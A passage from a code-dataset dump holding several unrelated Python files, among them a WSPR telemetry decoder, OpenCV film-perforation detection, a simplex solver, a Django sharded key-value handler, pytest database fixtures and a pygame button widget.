\n","sub_path":"template/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"224113558","text":"import os\nimport subprocess\nimport sys\n\nfrom libCore import *\n\n \n \n#\n# Takes in WSPR messages\n# Converts to decoded structures\n#\nclass WSPRDecoder:\n def __init__(self):\n pass\n \n def CanBeDecoded(self, name__value):\n retVal = False\n \n call = self.GetDecodedCallsign(name__value)\n if call == \"KD2KDD\" or call == \"KN4IUD\":\n retVal = True\n \n return retVal\n \n def DecodeList(self, nvList):\n retVal = []\n \n for name__value in nvList:\n retVal.append(self.Decode(name__value))\n \n return retVal\n \n \n # The callsign buffer will be used for:\n #\n # Position Values Usage (number of values)\n # Callsign 1 Q,0 Telemetry Channel (2)\n # Callsign 2 0-9,A-Z Speed (9)\n # Altitude 1,000ft increment (2)\n # Altitude 5000ft increment (2)\n # Callsign 3 0-9 Telemetry Channel (10)\n # Callsign 4 A-Z Grid Square 5th char (A-X) (24)\n # Callsign 5 A-Z Grid Square 6th char (A-X) (24)\n # Callsign 6 A-Z, space Temperature(8)\n # Voltage(3)\n def Decode(self, name__valueInput):\n # first, assume all decoded fields are the same as input\n name__value = dict(name__valueInput)\n \n # now, go through rules to determine what fields to add/modify\n name__value[\"CALLSIGN_DECODED\"] = self.GetDecodedCallsign(name__valueInput)\n name__value[\"SPEED_MPH\"] = self.GetDecodedSpeedMph(name__valueInput)\n name__value[\"ALTITUDE_FT\"] = self.GetDecodedAltitudeFt(name__valueInput)\n name__value[\"GRID_DECODED\"] = self.GetDecodedGrid(name__valueInput)\n name__value[\"TEMPERATURE_C\"] = self.GetDecodedTemperatureC(name__value)\n name__value[\"VOLTAGE\"] = 0\n \n return name__value\n \n def GetDecodedCallsign(self, name__value):\n retVal = None\n \n if len(name__value[\"CALLSIGN\"]) >= 6:\n id = str(name__value[\"CALLSIGN\"][0]) + str(name__value[\"CALLSIGN\"][2])\n \n #if id == \"00\":\n # retVal = \"KD2KDD\"\n \n if id == \"06\":\n retVal = \"KN4IUD\"\n if id == \"12\":\n retVal = \"KD2KDD\"\n if id == \"Q4\":\n retVal = \"KN4IUD\"\n \n return retVal\n \n def GetDecodedSpeedMph(self, name__value):\n speedKnotsIncr, ftIncr1000Val, ftIncr500Val = self.DecodeCallsign2(name__value)\n \n speedKnots = speedKnotsIncr * 16\n speedMph = round(speedKnots * 1.151)\n \n return speedMph\n \n def GetDecodedAltitudeFt(self, name__value):\n retVal = 0\n \n speedKnotsIncr, ftIncr1000Val, ftIncr500Val = self.DecodeCallsign2(name__value)\n ftIncr2000Val = self.DecodePower(name__value)\n \n retVal = (2000 * ftIncr2000Val) + (1000 * ftIncr1000Val) + (500 * ftIncr500Val)\n \n return retVal\n \n def GetDecodedGrid(self, name__value):\n grid0to4 = name__value[\"GRID\"]\n grid5to6 = name__value[\"CALLSIGN\"][3:5]\n \n grid0to6 = grid0to4 + grid5to6\n \n return grid0to6\n \n def GetDecodedTemperatureC(self, name__value):\n temperatureC = self.DecodeCallsign6(name__value)\n \n temperatureC = -50 + (temperatureC * 4)\n \n return temperatureC\n \n def DecodePower(self, name__value):\n dbm = name__value[\"DBM\"][1:] ;# strip the +\n \n powerList = [ 0, 3, 7, 10, 13, 17, 20, 23, 27, 30, 33, 37, 40, 43, 47, 50, 53, 57, 60 ]\n \n idxMatch = 0\n \n idx = 0\n for power in powerList:\n if dbm == str(power):\n idxMatch = idx\n \n idx += 1\n \n retVal = idxMatch\n \n return retVal\n \n def DecodeCallsign2(self, name__value):\n c2Val = self.UnMapFromAlphaNum(name__value[\"CALLSIGN\"][1])\n \n ftIncr500Val, c2Val = self.UnPack(c2Val, 2)\n ftIncr1000Val, c2Val = self.UnPack(c2Val, 2)\n speedKnotsIncr, c2Val = self.UnPack(c2Val, 9)\n \n return speedKnotsIncr, ftIncr1000Val, ftIncr500Val\n\n def DecodeCallsign6(self, name__value):\n c6Val = self.UnMapFromAlphaSpace(name__value[\"CALLSIGN\"][5])\n \n temperatureC, c6Val = self.UnPack(c6Val, 27)\n \n return temperatureC\n \n \n def UnMapFromAlphaNum(self, val):\n retVal = 0\n \n if val.isalpha():\n retVal = 10 + (ord(val) - ord('A'))\n else:\n retVal = ord(val) - ord('0')\n \n return retVal\n \n def UnMapFromAlphaSpace(self, val):\n retVal = 0\n \n if val == \" \":\n retVal = 26\n else:\n retVal = ord(val) - ord('A')\n \n return retVal\n \n \n def UnPack(self, unpackSource, valueCount):\n unpackVal = unpackSource % valueCount\n unpackSourceAdjusted = unpackSource // valueCount\n \n return unpackVal, unpackSourceAdjusted\n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"lib/libWSPRDecoder.py","file_name":"libWSPRDecoder.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"336037287","text":"import pandas as pd\nimport os\nfrom glob import glob\nimport pdb\nimport sys\nfrom PIL import Image\n\npath = '/media/yosunpeng/storehouse/SunFiles/datasets/pascal-voc/trainval/VOCdevkit/VOC2012/ImageSets/Main/'\n\n#location_dog = '/home/yosunpeng/Desktop/Main/dog_train.txt'\n#location_cat = '/home/yosunpeng/Desktop/Main/dog_train.txt'\n\n\ndef labels(path, model):\n if model=='train':\n list_train = glob(os.path.join(path, '*_train.txt'))\n #print(list_train)\n elif model=='trainval':\n list_train = glob(os.path.join(path, '*_trainval.txt'))\n elif model=='val':\n list_train = glob(os.path.join(path, '*_val.txt'))\n else:\n sys.exit('wrong model name, please check splling: train, trainval or val') \n #print(os.path.basename(list_train[1]))\n list_train.sort()\n list_name = []\n for i in range(len(list_train)):\n x = os.path.basename(list_train[i])\n list_name.append(x.split(sep='_'))\n\n list_name = [ x[0] for x in list_name ]\n dict_name = { i : list_name[i] for i in range(len(list_name)) }\n\n for i, _path in enumerate(list_train):\n if i==0:\n train_labels = pd.read_csv(_path, names=[0, dict_name.get(0)] , delim_whitespace=True, header=None)\n else:\n _append = pd.read_csv(_path, names=[i, dict_name.get(i)], delim_whitespace=True, header=None)\n train_labels = pd.concat([train_labels, _append[dict_name.get(i)]], axis=1)\n\n\n _list = list(dict_name.values()).insert(0, 0)\n train_labels = train_labels.set_index(0)\n del train_labels.index.name\n train_labels.rename(index=str, columns=_list)\n\n\n #pdb.set_trace()\n if model=='train':\n train_labels.to_csv(os.path.join(path, 'train.csv'))\n #print(list_train)\n elif model=='trainval':\n train_labels.to_csv(os.path.join(path, 'trainval.csv'))\n else:\n train_labels.to_csv(os.path.join(path, 'val.csv'))\n return train_labels\n #pdb.set_trace()\n #for train in list_train:\n\ndef load_labels():\n # \n labels_train = labels(path, 'train')\n labels_val = labels(path, 'val')\n return labels_train.values, labels_val.values\n#labels(path, 'train')\n#labels(path, 'trainval')\n#labels(path, 'val')\n#pdb.set_trace()\n","sub_path":"old/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"315382548","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pyroomacoustics as pra\n\ndistance = 0.5\n\nroom = pra.ShoeBox([6, 6], fs=48000)\n\nroom.add_source([1, 5.5])\n\nR = np.c_[\n [3-distance*3, 3], # Mic 1\n [3-distance/2, 3], # Mic 2\n [3+distance/2, 3], # Mic 3\n [3+distance*3, 3] # Mic 4\n]\n\n","sub_path":"00Junk00/OldStuff/AudioLocalizationTest/DoA_Test.py","file_name":"DoA_Test.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"186473358","text":"import numpy as np\nimport imageio as im\nimport matplotlib.pyplot as plt\n# Importacion de bibliotecas matematica, manejo imagenes y graficado\n\n# Creacion de las funciones im2double e im2uint8 por la falta de \n# equivalentes en Python\ndef im2double(im):\n info = np.iinfo(im.dtype) # Consiguie el tipo de dato de la imagen\n # Divide todos los valores por el maximo\n return im.astype(np.float64) / info.max \n\ndef im2uint8(im):\n info = np.iinfo(np.uint8) # Consiguie el tipo de dato de la imagen\n # Multiplica por el valor maximo\n temp = im*info.max\n temp[temp>info.max] = info.max\n temp[temp\")\ndef user_profile(username):\n user = User.query.filter(User.username == username).first_or_404()\n return render_template(\"user/user.html\", user=user)\n\n\n@user.route(\"/follow/\")\n@login_required\ndef follow(username):\n user = User.query.filter(User.username == username).first()\n if user is None:\n flash(f\"User with that {username} is not found\", \"danger\")\n return redirect(url_for('main.home'))\n if user == current_user:\n flash('You cannot follow yourself!')\n return redirect(url_for('user.user_profile', username=username))\n current_user.follow(user)\n db.session.commit()\n flash(f\"You are following {username}\", \"success\")\n return redirect(url_for('user.user_profile', username=username))\n\n\n@user.route('/unfollow/')\n@login_required\ndef unfollow(username):\n user = User.query.filter_by(username=username).first()\n if user is None:\n flash(f\"User with that {username} is not found\", \"danger\")\n return redirect(url_for('main.home'))\n if user == current_user:\n flash('You cannot unfollow yourself!', \"danger\")\n return redirect(url_for('user.user_profile', username=username))\n current_user.unfollow(user)\n db.session.commit()\n flash(f\"You are not following {username}\", \"success\")\n return redirect(url_for('user.user_profile', username=username))","sub_path":"user/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"177498640","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri 19 Jul 2019\n\n@author: daiana y fmozo\n\"\"\"\n################################### Imports ###########################################\nimport cv2\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage as ndi\nimport numpy as np\n\nfrom project.functions import processing\n#######################################################################################\n\n\ndef find_perf(I):\n ##############################################################\n ## Devuelve imagen con perf encontradas y matriz (cubo) con ##\n ## esquinas de las perf orden (II,SI,SD,ID) ##\n ##############################################################\n\n ret, J = cv2.threshold(I,200,255,cv2.THRESH_TOZERO)\n\n kernel = np.ones((5,5),np.uint8)\n J = cv2.erode(J,kernel,iterations = 2)\n kernel = np.ones((4,4),np.uint8)\n J = cv2.dilate(J,kernel, iterations = 2)\n\n ret, J = cv2.threshold(J,200,255,cv2.THRESH_BINARY)\n\n found_perf = np.zeros(J.shape)\n J = cv2.cvtColor(J, cv2.COLOR_BGR2GRAY)\n contours,_ = cv2.findContours(J, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n perf_corners = np.zeros((40,4,2)).astype(int)\n index = 0\n for cnt in contours:\n rect = cv2.minAreaRect(cnt)\n # box = vertices del rect sent antihorario arranca\n # esquina superior derecha\n box = np.int0(cv2.boxPoints(rect))\n\n # Calculo datos de interes de los rectangulos\n x_min = np.amin(box, axis=0)[0]\n x_max = np.amax(box, axis=0)[0]\n\n y_min = np.amin(box[:,1])\n y_max = np.amax(box[:,1])\n\n #filtro por area y long de los lados\n h,w = y_max-y_min, x_max-x_min\n area = h*w\n area_range_ok = (area >3200) and (area<105000)\n dim_proportion_ok = np.abs(h-w) < 30\n if area_range_ok and dim_proportion_ok :\n cv2.drawContours(found_perf,[box],0,(255),3)\n\n # reordeno los vertices y los guardo\n x1 = box[0,0]\n x3 = box[2,0]\n aux = box.copy() # aux = box ordenado\n if x1 >= x3 : #hay que rotar\n aux[0,:],aux[1,:],aux[2,:],aux[3,:], = box[1,:],box[2,:],box[3,:],box[0,:]\n perf_corners[index,:,:] = aux[:,:]\n index += 1\n\n perf_corners[index,:,:] = np.ones((4,2)).astype(int)*(-1)\n return found_perf, perf_corners\n#######################################################################################\n\n\ndef calc_rotation(oriented_corners):\n ###############################################################\n # calcula mediante promedio de pendientes, el angulo a rotar ##\n ###############################################################\n angles = np.zeros((1, 30))\n ang_index = 0\n index = 0\n while oriented_corners[index, 0, 0] != -1:\n x1, y1 = oriented_corners[index, 1, 0], oriented_corners[index, 1, 1]\n x2, y2 = oriented_corners[index, 2, 0], oriented_corners[index, 2, 1]\n angles[0, ang_index] = processing.angle(x1, y1, x2, y2)\n ang_index += 1\n\n x1, y1 = oriented_corners[index, 0, 0], oriented_corners[index, 0, 1]\n x2, y2 = oriented_corners[index, 3, 0], oriented_corners[index, 3, 1]\n angles[0, ang_index] = processing.angle(x1, y1, x2, y2)\n ang_index += 1\n index += 1\n angles[0, ang_index] = -1\n\n # promedio todos los angulos calculados\n i = 0\n ang_mean = 0\n while angles[0, i] != -1:\n ang_mean += angles[0, i]\n i += 1\n ang_mean = ang_mean / i\n return ang_mean\n#######################################################################################\n\n\ndef borde(franja):\n\n blur = cv2.GaussianBlur(franja,(5,5),0)\n\n edges = cv2.Laplacian(blur, -1, ksize = 5)\n\n _, binaria = cv2.threshold(edges,80,255,cv2.THRESH_BINARY)\n binaria = cv2.cvtColor(binaria, cv2.COLOR_RGB2GRAY)\n\n ### Detección de líneas aplicado al Laplaciano\n\n rho = 1 # distance resolution in pixels of the Hough grid\n theta = np.pi / 180 # angular resolution in radians of the Hough grid\n threshold = 40 # minimum number of votes (intersections in Houg, cmap = 'gray'h grid cell)\n min_line_length = 160 # minimum number of pixels making up a line\n max_line_gap = 0 # maximum gap in pixels between connectable line segments\n line_image = np.copy(binaria) * 0 # creating a blank to draw lines on\n\n\n # Run Hough on edge detected image\n # Output \"lines\" is an array containing endpoints of detected line segments\n lines = cv2.HoughLinesP(binaria, rho, theta, threshold, np.array([]),\n min_line_length, max_line_gap)\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(line_image,(x1,y1),(x2,y2),(255,0,0),1)\n\n return line_image, lines\n#######################################################################################\n\n\ndef det_frame(I, x, superior, inferior, derecho):\n\n sup = I[int(x[0,0,1]): int(x[0,1,1]), int(x[0,0,0]):, :]\n img1, bordesup = borde(sup)\n superior.append(int(x[0,0,1]) + np.max(bordesup[:,0,1]))\n\n inf = I[int(x[1,0,1]): int(x[1,1,1]), int(x[1,0,0]):, :]\n img2, bordeinf = borde(inf)\n inferior.append(int(x[1,0,1]) + np.min(bordeinf[:,0,1]))\n\n # Tomo un margen de +20 y -20 arriba y abajo para evitar posibles errores\n inter = I[int(x[0,0,1]) + bordesup[0,0,1] + 20: int(x[1,0,1]) + bordeinf[0,0,1] - 20, int(x[0,0,0]) + 400: , :]\n img3, bordeder = borde(inter)\n derecho.append(int(x[0,0,0]) + 400 + np.min(bordeder[:,0,0]))\n\n return superior, inferior, derecho\n#######################################################################################\n\n\ndef manual_input(I):\n\n plt.figure()\n plt.imshow(I)\n plt.title('Marque esquinas superior izquierda e inferior derecha del frame:')\n p = plt.ginput(2)\n\n plt.show(block=False)\n plt.pause(3)\n plt.close()\n\n return int(p[0][1]), int(p[1][1]), int(p[0][0]), int(p[1][0])\n#######################################################################################\n","sub_path":"project/functions/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"475892128","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\nfrom helpers.geometry import get_distance\nfrom src.ClosedFigure import ClosedFigure\n\n\nclass Circle(ClosedFigure):\n def __init__(self, border_color, inner_color, center_point, border_points):\n super().__init__(\n center_point=center_point,\n border_color=border_color,\n inner_color=inner_color,\n border_points=border_points,\n )\n\n def render(self, qp):\n qp.setPen(self.pen)\n qp.setBrush(self.inner_color)\n radius = get_distance(self.center_point, self.border_points[0])\n qp.drawEllipse(self.center_point, radius, radius)\n","sub_path":"src/Circle.py","file_name":"Circle.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"545682558","text":"from typing import Optional\nfrom RestrictionSystem import RestrictionSystem\nfrom sys import float_info\nfrom SimplexMethod import SimplexTable\n\nclass ConsistentRefinementOfEstimates(SimplexTable):\n def __init__(self, system: Optional[RestrictionSystem] = None):\n SimplexTable.__init__(self, system)\n\n def __check_objective_function__(self):\n for v in self.__objective_function__.coefficients:\n if v < 0:\n return False\n return True\n\n def __valid_simplex_table__(self):\n valid = super().__valid_simplex_table__()\n if valid:\n return True\n return self.__check_objective_function__()\n \n def __one_step__(self):\n rows = []\n for i in range(len(self.__rows__)):\n if self.__rows__[i].free_member < 0:\n rows.append(i)\n rows = sorted(rows, key=lambda v: self.__rows__[v].free_member)\n for row_number in rows: \n best_column = None\n bestValue = float_info.max\n row = self.__rows__[row_number]\n for j in range(len(row.coefficients)):\n if row.coefficients[j] < 0 and self.__objective_function__.coefficients[j] > 1e-7:\n value = -self.__objective_function__.coefficients[j] / \\\n row.coefficients[j]\n if value < bestValue:\n bestValue = value\n best_column = j\n if best_column != None:\n self.__create_basis__(row_number, best_column)\n return True\n return False\n\n def __find_all_basis__(self):\n \"\"\"\n Ищет базисы, которые были до этого\n Возвращает истина, если нашел базисы для всех строк\n \"\"\"\n if self.full_basis():\n return True\n count_variable = len(self.__objective_function__.coefficients)\n for j in range(count_variable):\n first_row = None\n second_row = None\n for i in range(0, len(self.__rows__)):\n row = self.__rows__[i]\n if abs(row.coefficients[j]) > 1e-7:\n if first_row != None:\n second_row = i\n break\n else:\n first_row = i\n if second_row == None and first_row != None:\n self.__create_basis__(first_row, j)\n return self.full_basis()\n\n def one_step(self):\n if not self.__find_all_basis__():\n return self.init()\n if self.__check_objective_function__():\n return self.__one_step__()\n elif super().__valid_simplex_table__():\n return super().__one_step__()\n else: \n return self.init()\n \n","sub_path":"Lab5/OM_5/ConsistentRefinementOfEstimates.py","file_name":"ConsistentRefinementOfEstimates.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"343394571","text":"from django.http import JsonResponse\nfrom dsproj_app.classes.Shards import Shards\nfrom hashlib import sha1\nimport urllib.parse\nimport requests\nimport re\nfrom json import dumps, loads\nfrom dsproj_app.classes.Store import Store\nimport random\nfrom os import environ\nfrom dsproj_app.views import get_array_views\n\n# return JSON pls\ndef shard_handler(request, method, route, details):\n shards = details[\"shards\"]\n store = details[\"store\"]\n # route is //\n print(\"route: \", route)\n if method == \"GET\":\n if \"my_id\" in route:\n return get_id(shards)\n elif \"all_ids\" in route:\n return get(shards)\n elif \"members\" in route:\n return get_members_in_ID(shards, route.split(\"/\")[1])\n elif \"count\" in route:\n return get_key_count_of_ID(shards, store, route.split(\"/\")[1])\n elif method == \"PUT\":\n body_unicode = request.body.decode(\"utf-8\")\n body = urllib.parse.parse_qs(body_unicode)\n if \"make_invalid\" in route:\n print(\"BODY: \")\n print(body)\n\n invalid_store = body[\"store\"][0]\n return make_invalid(invalid_store, store)\n \n num_shards = body[\"num\"][0]\n should_broadcast = True\n if \"broadcaster\" in body:\n should_broadcast = False\n return put(shards, num_shards, store, should_broadcast)\n # GET /shard/my_id\n # GET /shard/all_ids\n # GET /shard/members/\n # GET /shard/count/\n # PUT /shard/changeShardNumber -d=”num=”\n\n # PUT /shard/changeShardNumber -d=”num=”\n # Should initiate a change in the replica groups such that the key-values are redivided\n # across groups and returns a list of all shard ids, as in GET /shard/all_ids\n # {“result”: “Success”,\n # “shard_ids”: “0,1,2”},\n # Status = 200\n # If is greater than the number of nodes in the view, please return:\n # {“result”: “Error”,\n # “msg”: “Not enough nodes for shards”},\n # Status = 400\n # If there is only 1 node in any partition as a result of redividing into shards,\n # abort the operation and return:\n # {“result”: Error”,\n # “msg”: “Not enough nodes. shards result in a nonfault tolerant shard”},\n # Status = 400\n # The only time one should have 1 node in a shard is if there is only one node in the entire system.\n # In this case it should only return an error message if you try to increase the number of shards beyond 1,\n # you should not return the second error message in this case.\n\ndef make_invalid(invalid_store, store):\n invalid_store = loads(invalid_store)\n for key, val in invalid_store.items():\n store.add(key, \"this-is-invalid\", {})\n return JsonResponse({}, status=200)\n\n\ndef put(shards, num_shards, store, should_broadcast):\n response = shards.update(num_shards, store)\n if should_broadcast == True:\n payload_to_send = {\"num\": num_shards, \"broadcaster\": False}\n ips = get_array_views()\n my_ip = environ.get(\"IP_PORT\")\n for ip in ips:\n if ip == my_ip:\n continue\n url = \"http://\" + ip + \"/shard/changeShardNumber\"\n requests.put(url, data=payload_to_send)\n status = None\n if response[\"is_successful\"]:\n status = 200\n return JsonResponse(response, status=status)\n else:\n status = 400\n return JsonResponse(response, status=status)\n\n\n# returns all id's\n# GET /shard/my_id\n# Should return the container’s shard id\n# {“id”:},\n# Status = 200\n\n\ndef get_id(shards):\n response = {\"id\": shards.get_my_shard()}\n return JsonResponse(response, status=200)\n\n\n# return specific id\n# GET /shard/all_ids\n# Should return a list of all shard ids in the system as a string of comma separated values.\n# {“result”: “Success”,\n# “shard_ids”: “0,1,2”},\n# Status = 200\n\n\ndef get(shards):\n response = {\"shard_ids\": shards.get_keys()}\n return JsonResponse(response, status=200)\n\n\n# returns all the IP_PORTS associated with that shard ID\n# GET /shard/members/\n# Should return a list of all members in the shard with id .\n# Each member should be represented as an ip-port address. (Again, the same one you pass into VIEW)\n# {“result” : “Success”,\n# “members”: “176.32.164.2:8080,176.32.164.3:8080”},\n# Status = 200\n# If the is invalid, please return:\n# {“result”: “Error”,\n# “msg”: “No shard with id ”},\n# Status = 404\n\n\ndef get_members_in_ID(shards, id):\n response = {}\n status = 400\n members = shards.get_members_in_ID(int(id))\n if members != None:\n members = \",\".join(members)\n response = {\"result\": \"Success\", \"members\": members}\n status = 200\n else:\n response = {\"result\": \"Error\", \"msg\": \"No shard with id \" + str(id)}\n status = 404\n return JsonResponse(response, status=status)\n\n\n# GET /shard/count/\n# Should return the number of key-value pairs that shard is responsible for as an integer\n# {“result”: “Success”,\n# “Count”: },\n# Status = 200\n# If the is invalid, please return:\n# {“result”: “Error”,\n# “msg”: “No shard with id ”},\n# Status = 404\n\n\ndef get_key_count_of_ID(shards, store, id):\n # print(\"not implemented yet: \", id)\n status = 404\n response = {\"result\": \"Error\", \"msg\": \"No shard with id \" + str(id)}\n # if it is not our current shard, request to a node\n # in that shard for their store size\n # else, we're in right shard and just return our store size\n my_shard_id = int(shards.get_my_shard())\n if my_shard_id == int(id):\n status = 200\n response = {\"result\": \"Success\", \"Count\": store.length()}\n return JsonResponse(response, status=status)\n else:\n members = shards.get_members_in_ID(int(id))\n if members != None:\n random_ip = random.choice(members)\n url = \"http://\" + random_ip + \"/shard/count/\" + str(id)\n response = requests.get(url, data={})\n return JsonResponse(response.json(), status=response.status_code)\n return JsonResponse(response, status=status)\n","sub_path":"dsproj_app/api_functions/api_shard_handler.py","file_name":"api_shard_handler.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"624779486","text":"import pytest\nfrom src.database_manager import database_connection\nfrom src.config import db_conn\nimport mysql.connector\n\n\n@pytest.fixture()\ndef init_MyDB_connection():\n # establish connection to test database\n test_db_conn = dict(db_conn)\n test_db_conn['database'] = 'sanpster_remote_test'\n db = database_connection.MyDB(test_db_conn)\n\n yield db # perform tests on db object\n\n del db # delete the database object\n\n@pytest.fixture()\ndef init_query_connection_collapse(init_MyDB_connection):\n db = init_MyDB_connection\n db.query('drop table if exists pet')\n\n test_db_conn = dict(db_conn)\n\n cnx = mysql.connector.connect(**test_db_conn)\n cursor = cnx.cursor(buffered=True)\n\n # simulate the server terminating the\n # database connection\n cursor.execute('kill {}'.format(db.database_connection.connection_id))\n cnx.commit()\n\n yield db\n\n db.query('drop table pet')\n cursor.close() # close the cursor\n cnx.close() # close the database connection\n\n\n\n\n\n\n\n\n","sub_path":"application/src/test_pkg/unit/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"292272648","text":"import numpy as np\nimport scipy\nfrom sklearn import datasets\nfrom sklearn import naive_bayes\nfrom sklearn import svm\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import classification\nimport operator\nimport matplotlib.pyplot as plt\n\n\ndigits = datasets.load_digits()\nrng = np.random.RandomState(0)\nindices = np.arange(len(digits.data))\nrng.shuffle(indices)\n\nSLICE = 50\n\ntrain_index = indices[:SLICE]\ntest_index = indices[-8*SLICE:]\n\nx_test = digits.data[test_index]\ny_true = digits.target[test_index]\n\nplt.figure(1)\nplt_x = []\nplt_y = []\n\nfor index in range(10):\n x = digits.data[train_index]\n y = digits.target[train_index]\n\n plt_x.append(len(train_index))\n\n gnb = naive_bayes.GaussianNB()\n #gnb = svm.SVC()\n gnb.fit(x, y)\n result = gnb.predict(x_test)\n num = (result != y_true).sum()\n #plt_y.append(1-num/len(test_index))\n plt_y.append(classification.precision_score(y_true, result))\n print(classification_report(y_true, result))\n print(classification.accuracy_score(y_true, result))\n print(classification.precision_score(y_true, result))\n print(\"%d\" %(index))\n train_index = indices[:int(len(train_index)+SLICE/2)]\n\nprint(plt_y)\nplt.plot(plt_x, plt_y)\nplt.ylim(0.3, 0.9)\nplt.show()","sub_path":"old/simpleGNB.py","file_name":"simpleGNB.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"247844584","text":"from .base_widget import BaseWidget\r\nfrom engine.globs import CUADRO, TEXT_FG, BOX_SEL_BACK, TEXT_SEL, BISEL_BG, CANVAS_BG\r\nfrom pygame import Rect, Surface, draw, font\r\nfrom engine.libs.textrect import render_textrect\r\n\r\n\r\nclass Boton(BaseWidget):\r\n img_pre = None\r\n img_dis = None\r\n\r\n comando = None\r\n pos = 0, 0\r\n\r\n timer = 0\r\n animar = False\r\n\r\n def __init__(self, parent, nombre, ancho_mod, comando, pos, texto=None):\r\n self.tipo = 'boton'\r\n self.comando = None\r\n self.direcciones = {}\r\n self.nombre = nombre\r\n if texto is None:\r\n sel, pre, uns, dis = self.crear(nombre, ancho_mod)\r\n else:\r\n sel, pre, uns, dis = self.crear(texto, ancho_mod)\r\n self.img_sel = sel\r\n self.img_pre = pre\r\n self.img_uns = uns\r\n self.img_dis = dis\r\n self.pos = pos\r\n super().__init__(parent, imagen=self.img_uns)\r\n self.rect = self.img_sel.get_rect(topleft=self.pos)\r\n\r\n self.comando = comando\r\n\r\n def ser_presionado(self):\r\n self.animar = True\r\n\r\n def ser_deshabilitado(self):\r\n self.image = self.img_dis\r\n self.enabled = False\r\n\r\n def ser_habilitado(self):\r\n self.image = self.img_uns\r\n self.enabled = True\r\n\r\n def mantener_presion(self):\r\n self.image = self.img_pre\r\n\r\n def liberar_presion(self):\r\n self.image = self.img_sel\r\n if self.enabled:\r\n self.comando()\r\n\r\n def presionar(self, lt):\r\n if self.enabled:\r\n self.timer += 1\r\n if self.timer <= lt:\r\n self.image = self.img_pre\r\n\r\n elif lt + 1 <= self.timer <= lt * 2:\r\n self.image = self.img_sel\r\n\r\n elif self.timer == lt * 2 + 1:\r\n self.comando()\r\n\r\n else:\r\n self.timer = 0\r\n self.animar = False\r\n\r\n def crear(self, texto, ancho_mod):\r\n ancho = CUADRO * ancho_mod\r\n\r\n rect = Rect((-1, -1), (ancho - 6, CUADRO - 6))\r\n\r\n cnvs_pre = Surface((ancho + 6, CUADRO + 6))\r\n cnvs_pre.fill(CANVAS_BG)\r\n cnvs_sel = cnvs_pre.copy()\r\n cnvs_uns = cnvs_pre.copy()\r\n cnvs_dis = cnvs_pre.copy()\r\n\r\n fnd_pre = self.create_sunken_canvas(ancho, CUADRO)\r\n fnd_uns = self.create_raised_canvas(ancho, CUADRO)\r\n\r\n for i in range(round((ancho + 6) / 3)):\r\n # linea punteada horizontal superior\r\n draw.line(cnvs_sel, BOX_SEL_BACK, (i * 7, 0), ((i * 7) + 5, 0), 2)\r\n\r\n # linea punteada horizontal inferior\r\n draw.line(cnvs_sel, BOX_SEL_BACK, (i * 7, CUADRO + 4), ((i * 7) + 5, CUADRO + 4), 2)\r\n\r\n for i in range(round((CUADRO + 6) / 3)):\r\n # linea punteada vertical derecha\r\n draw.line(cnvs_sel, BOX_SEL_BACK, (0, i * 7), (0, (i * 7) + 5), 2)\r\n\r\n # linea punteada vertical izquierda\r\n draw.line(cnvs_sel, BOX_SEL_BACK, (ancho + 4, i * 7), (ancho + 4, (i * 7) + 5), 2)\r\n\r\n cnvs_sel.blit(fnd_uns, (3, 3))\r\n cnvs_uns.blit(fnd_uns, (3, 3))\r\n cnvs_dis.blit(fnd_uns, (3, 3))\r\n cnvs_pre.blit(fnd_pre, (3, 3))\r\n\r\n bold = font.Font('engine/libs/Verdanab.ttf', 16)\r\n fuente = font.Font('engine/libs/Verdana.ttf', 16)\r\n\r\n btn_sel = render_textrect(texto, bold, rect, TEXT_SEL, CANVAS_BG, 1)\r\n btn_uns = render_textrect(texto, fuente, rect, TEXT_FG, CANVAS_BG, 1)\r\n btn_dis = render_textrect(texto, fuente, rect, BISEL_BG, CANVAS_BG, 1)\r\n\r\n cnvs_uns.blit(btn_uns, (6, 6))\r\n cnvs_sel.blit(btn_sel, (6, 6))\r\n cnvs_pre.blit(btn_sel, (6, 6))\r\n cnvs_dis.blit(btn_dis, (6, 6))\r\n\r\n return cnvs_sel, cnvs_pre, cnvs_uns, cnvs_dis\r\n\r\n def __repr__(self):\r\n return self.nombre + ' _boton Sprite'\r\n\r\n def update(self):\r\n if self.animar:\r\n self.presionar(5)\r\n","sub_path":"engine/UI/widgets/_boton.py","file_name":"_boton.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"306410160","text":"from __future__ import print_function, division\nimport json\nfrom 